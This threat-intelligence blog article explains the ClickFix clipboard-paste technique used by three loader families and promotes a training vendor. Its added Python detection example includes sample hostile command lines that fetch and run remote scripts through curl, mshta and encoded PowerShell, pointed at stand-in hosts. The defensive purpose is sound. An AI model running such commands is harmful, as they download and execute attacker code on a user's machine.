Threats | 5 min read | 17 June 2026

ClickFix Goes Mainstream: Three Loader Families Exploit the Same Social-Engineering Trick

BabaDeda, Lorem Ipsum, and Potemkin loaders all use the same clipboard-paste attack pattern — and education and finance organizations absorbed the bulk of April 2026 hits.

Elena Fischer, Threat Intelligence Analyst

Three separate loader families are now riding ClickFix, the social-engineering technique that turns victims into their own attackers — and research teams documented all three in the same reporting window.

What ClickFix Actually Does

ClickFix is not an exploit. There is no CVE. No unpatched library. No macro warning the user has to dismiss. Instead, a lure page — typically a fake CAPTCHA, a spoofed browser-update screen, or a counterfeit document-verification portal — instructs the visitor to press Win+R to open the Run dialog, paste a command the page has already written to the clipboard without any visible prompt, and hit Enter. The pasted command usually calls `mshta`, `powershell`, or `curl` to pull down the next-stage loader. The user performs the execution step themselves. SmartScreen never prompts because no downloaded file was opened; the command runs from the Run dialog like anything else the user types.

That framing matters. The attack chain requires human cooperation at the most critical step.

Three Loaders, One Technique

Researchers documented three distinct families — BabaDeda Loader, Lorem Ipsum Loader, and Potemkin — each attributed to separate operator sets, each adopting ClickFix as the preferred initial-access path. The convergence happened within a single reporting window, which analysts should read as a signal about technique adoption across the commodity loader ecosystem, not as evidence of one coordinated campaign.

BabaDeda's April 2026 activity stands out on its own. Earlier BabaDeda campaigns targeted a different victim profile. The April wave hit education and financial organizations — a notable shift that defenders in those sectors should flag when reviewing detection coverage against prior cluster reporting.

Loader names here are analytic conveniences. Infrastructure or payload overlap between BabaDeda, Lorem Ipsum, and Potemkin is plausible but unconfirmed at the time of writing. Do not assume clean separation between the three operators.

Why Loader Authors Keep Choosing ClickFix

The honest answer is efficiency. ClickFix sidesteps most of the controls that defenders have spent years tuning: macro warnings, SmartScreen, sandboxed browser downloads, and attachment-scanning. It also requires no vulnerability in the target software stack. A loader author who adopts ClickFix inherits those evasion properties for free.

The Verizon 2024 Data Breach Investigations Report found that the human element contributed to 68 percent of breaches — a figure that makes techniques requiring direct user action worth watching closely. ClickFix is precisely that kind of technique, and three loader families adopting it in parallel suggests the commodity market has made its verdict.

The Control That Failed: Security Awareness

A technical defense can stop a file-based payload at the perimeter. It cannot stop a user who has been socially conditioned to paste a command they do not understand into the Windows Run dialog. The kill chain here has exactly one mandatory human decision point, and that is where the failure occurs.

Organizations that run regular, scenario-based security awareness training — specifically drills that teach employees to recognize fake CAPTCHA screens and impersonation lures — place friction at that exact decision point. Telling users "no legitimate website will ever ask you to paste a command into your computer" is a short, testable rule. Training staff to recognize the visual patterns of ClickFix lure pages before they reach the Run dialog is the upstream catch that no EDR rule can replicate. Programs like those available at Train2Secure build that muscle memory through realistic simulations rather than annual slide decks.

What the Missing Technical Controls Look Like

Beyond awareness, defenders have several options — none of them perfect in isolation.

Execution chain telemetry is the fastest win. Look for `explorer.exe` spawning `powershell.exe`, `mshta.exe`, or `cmd.exe` with a command line that contains base64 strings or a remote URL. That is the canonical ClickFix fingerprint and it should fire alerts in any mature SIEM.
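The execution-chain rule described above, as an added Python example (not code from the article or from Train2Secure): it runs the explorer.exe-spawns-interpreter check over a few constructed process-creation events. The field names ParentImage, Image and CommandLine follow Sysmon Event ID 1; the events themselves, the `example.invalid` host and the 192.0.2.10 address are constructed samples, not captured telemetry. Beyond the page's wording, the example also decodes a PowerShell `-EncodedCommand` payload so an alert carries the real script text rather than an opaque blob.

```python
import base64
import binascii
import re

# Child interpreters the article names as the ClickFix fingerprint when spawned by explorer.exe
SUSPECT_CHILDREN = {"powershell.exe", "mshta.exe", "cmd.exe"}

URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s\"']+", re.IGNORECASE)
# A long unbroken base64 run; 40+ chars avoids noise from paths, GUIDs and short flags
B64_RE = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{40,}={0,2}(?![A-Za-z0-9+/=])")
# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common spellings
ENC_FLAG_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+(\S+)", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Decode a -EncodedCommand payload (base64 of UTF-16LE) so the alert shows the script text."""
    m = ENC_FLAG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def classify(event: dict) -> list:
    """Return the reasons an event matches the ClickFix execution chain, or [] if it does not."""
    if basename(event.get("ParentImage", "")) != "explorer.exe":
        return []
    if basename(event.get("Image", "")) not in SUSPECT_CHILDREN:
        return []
    cmd = event.get("CommandLine", "")
    reasons = []
    if URL_RE.search(cmd):
        reasons.append("remote URL in command line")
    if ENC_FLAG_RE.search(cmd) or B64_RE.search(cmd):
        reasons.append("base64 payload in command line")
    return reasons


def scan(events) -> list:
    """Run classify() over a stream of process-creation events and collect alerts."""
    findings = []
    for ev in events:
        reasons = classify(ev)
        if reasons:
            findings.append({
                "image": basename(ev.get("Image", "")),
                "reasons": reasons,
                "decoded": decode_encoded_command(ev.get("CommandLine", "")),
            })
    return findings


# Constructed sample events (not real telemetry). Field names follow Sysmon Event ID 1.
ENCODED = base64.b64encode("Write-Host 'constructed sample'".encode("utf-16-le")).decode()
EXPLORER = r"C:\Windows\explorer.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # 1: Run-dialog PowerShell with an encoded command -> alert
    {"ParentImage": EXPLORER, "Image": POWERSHELL,
     "CommandLine": f"powershell -w hidden -ep bypass -enc {ENCODED}"},
    # 2: Run-dialog mshta pulling a remote HTA -> alert
    {"ParentImage": EXPLORER, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://example.invalid/verify.hta"},
    # 3: Run-dialog cmd piping a remote script into PowerShell -> alert
    {"ParentImage": EXPLORER, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c curl -s http://192.0.2.10/setup.ps1 | powershell -"},
    # 4: user simply opened a PowerShell prompt from the Run dialog -> no alert
    {"ParentImage": EXPLORER, "Image": POWERSHELL, "CommandLine": f'"{POWERSHELL}"'},
    # 5: same encoded command, but the parent is not explorer.exe -> outside this rule's scope
    {"ParentImage": r"C:\Program Files\Git\usr\bin\bash.exe", "Image": POWERSHELL,
     "CommandLine": f"powershell -enc {ENCODED}"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["image"], "|", "; ".join(f["reasons"]), "| decoded:", f["decoded"])
```

Event 5 is deliberately not matched: the rule is scoped to the explorer.exe parent exactly as the article describes it, and a separate rule keyed on the encoded-command flag alone would be the place to catch the same payload launched from another parent.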

Group Policy can disable the Run dialog entirely via the `NoRun` registry value under `HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer`. It is a blunt instrument that breaks legitimate administrative workflows, but it is worth scoping for high-risk user populations such as call-center staff, students, or any group that has no operational need to execute arbitrary commands.
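The `NoRun` check, as an added Python example (not from the article or from Train2Secure). Live registry reads need Windows, so it audits a `.reg` export of the policy key, the format written by `reg export`, and tells apart the three states an audit has to distinguish: enforced, present but set to 0, and not configured. The three exports are constructed samples; the key path and value name are the ones the article gives.

```python
import re

# Policy key and value the article names (HKCU); the same value under HKEY_LOCAL_MACHINE applies machine-wide
POLICY_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
POLICY_VALUE = "NoRun"


def parse_reg_export(text: str) -> dict:
    """Parse .reg text into {key_path_lower: {value_name_lower: raw_value}}.

    Registry key and value names are case-insensitive, so both are lower-cased.
    Multi-line hex continuations carry no '=' and are skipped; they are not needed here.
    """
    keys = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
        elif current is not None and "=" in line:
            name, value = line.split("=", 1)
            name = name.strip()
            name = "" if name == "@" else name.strip('"').lower()  # "@" is the key's default value
            keys[current][name] = value.strip()
    return keys


def run_dialog_policy(reg_text: str) -> str:
    """Report NoRun state: 'enforced', 'present but off', 'not configured' or 'unexpected type'."""
    values = parse_reg_export(reg_text).get(POLICY_KEY.lower(), {})
    raw = values.get(POLICY_VALUE.lower())
    if raw is None:
        return "not configured"
    m = re.fullmatch(r"dword:([0-9a-fA-F]{1,8})", raw)
    if not m:
        return "unexpected type"  # NoRun is REG_DWORD; anything else means a hand-edited policy
    return "enforced" if int(m.group(1), 16) != 0 else "present but off"


# Constructed exports (not from a real host) covering the states an audit must tell apart
REG_ENFORCED = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRun"=dword:00000001
"""

REG_PRESENT_OFF = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRun"=dword:00000000
"NoDriveTypeAutoRun"=dword:000000ff
"""

REG_NOT_CONFIGURED = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:000000ff
"""

if __name__ == "__main__":
    for label, text in [("enforced", REG_ENFORCED), ("present-off", REG_PRESENT_OFF),
                        ("absent", REG_NOT_CONFIGURED)]:
        print(f"{label}: {run_dialog_policy(text)}")
```

When reading a real export from disk, open it with `encoding="utf-16"`, since `reg export` writes UTF-16 with a byte-order mark; a value of 0 or an absent value both leave the Run dialog available, so only `enforced` counts as coverage for a scoped user population.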

Browser-layer clipboard detection is the cleanest upstream catch. Some endpoint detection tools flag `navigator.clipboard.writeText` calls originating from low-reputation domains — the exact mechanism ClickFix uses to populate the clipboard silently. If your EDR or browser-security tool surfaces that telemetry, tune it.

Defenders should also review their environments against the NIST Cybersecurity Framework guidance on user awareness and protective technology controls, both of which apply directly to this threat pattern.

What Defenders Should Do Now

"The message to end users needs to be specific and repeatable," said one threat intelligence practitioner commenting on the technique's rise in early 2026. "'No legitimate site will ever ask you to paste a command' is something you can test users on. Vague warnings about phishing do nothing against ClickFix."

That specificity is the point. Generic phishing awareness does not prepare users for a lure that looks like a CAPTCHA and asks them to perform an action they associate with fixing a technical problem. The scenario needs to be named, shown, and practiced.

For IOCs and loader-specific behavior across BabaDeda, Lorem Ipsum, and Potemkin, pull from the individual vendor writeups directly. Aggregated IOC lists risk attribution bleed between three families that may or may not share infrastructure.

The Broader Signal

ClickFix has moved from curiosity to default commodity technique. Three loader families in one reporting window is not coincidence — it is the market telling you where initial-access development energy is going. Expect more families to adopt it before the year ends. Organizations that treat this as a one-off campaign will be caught flat-footed when the next loader author makes the same choice.

Detection coverage, Group Policy hardening for appropriate user groups, and — most critically — trained employees who recognize clipboard-paste lures are the layered answer. No single control closes this. All three working together make ClickFix significantly more expensive for attackers to run at scale. Review your current training coverage and technical baselines against published pricing tiers to understand where gaps exist before the next loader family arrives.

How ClickFix attacks could have been stopped

  • Train employees on the specific visual patterns of ClickFix lures — fake CAPTCHAs, fake browser updates, fake document screens — so they recognize the attack before reaching the Run dialog.
  • Audit execution-chain telemetry for explorer.exe spawning PowerShell or mshta with base64 or remote URLs, and enable browser-layer clipboard-write detection on low-reputation domains.
  • Restrict the Windows Run dialog via Group Policy for any user population that has no legitimate need to execute arbitrary terminal commands.

Train2Secure's scenario-based simulations include clipboard-paste and fake-CAPTCHA lure drills that map directly to the ClickFix kill chain.


Frequently asked questions

What is ClickFix and why is it dangerous?

ClickFix is a social-engineering technique that tricks users into opening the Windows Run dialog and pasting attacker-supplied commands — typically pulled silently from the clipboard by a malicious webpage. Because the user executes the command themselves, most technical controls like SmartScreen and macro warnings never trigger.

Which organizations were targeted by BabaDeda in April 2026?

BabaDeda's April 2026 campaign targeted education and financial organizations — a shift from the loader's earlier victim profile. Defenders in both sectors should review detection coverage against this cluster.

Are BabaDeda, Lorem Ipsum Loader, and Potemkin operated by the same threat actor?

No. Research teams attributed the three loaders to separate operator sets. Infrastructure or payload overlap is possible but unconfirmed. Treat them as distinct families that independently adopted ClickFix as an initial-access technique.

How can organizations defend against ClickFix attacks?

Layer three controls: train users to recognize clipboard-paste lures and the rule that no legitimate site requests command execution; monitor for execution chains where explorer.exe spawns mshta.exe or powershell.exe with base64 or remote URLs; and consider disabling the Run dialog via Group Policy for high-risk user groups.

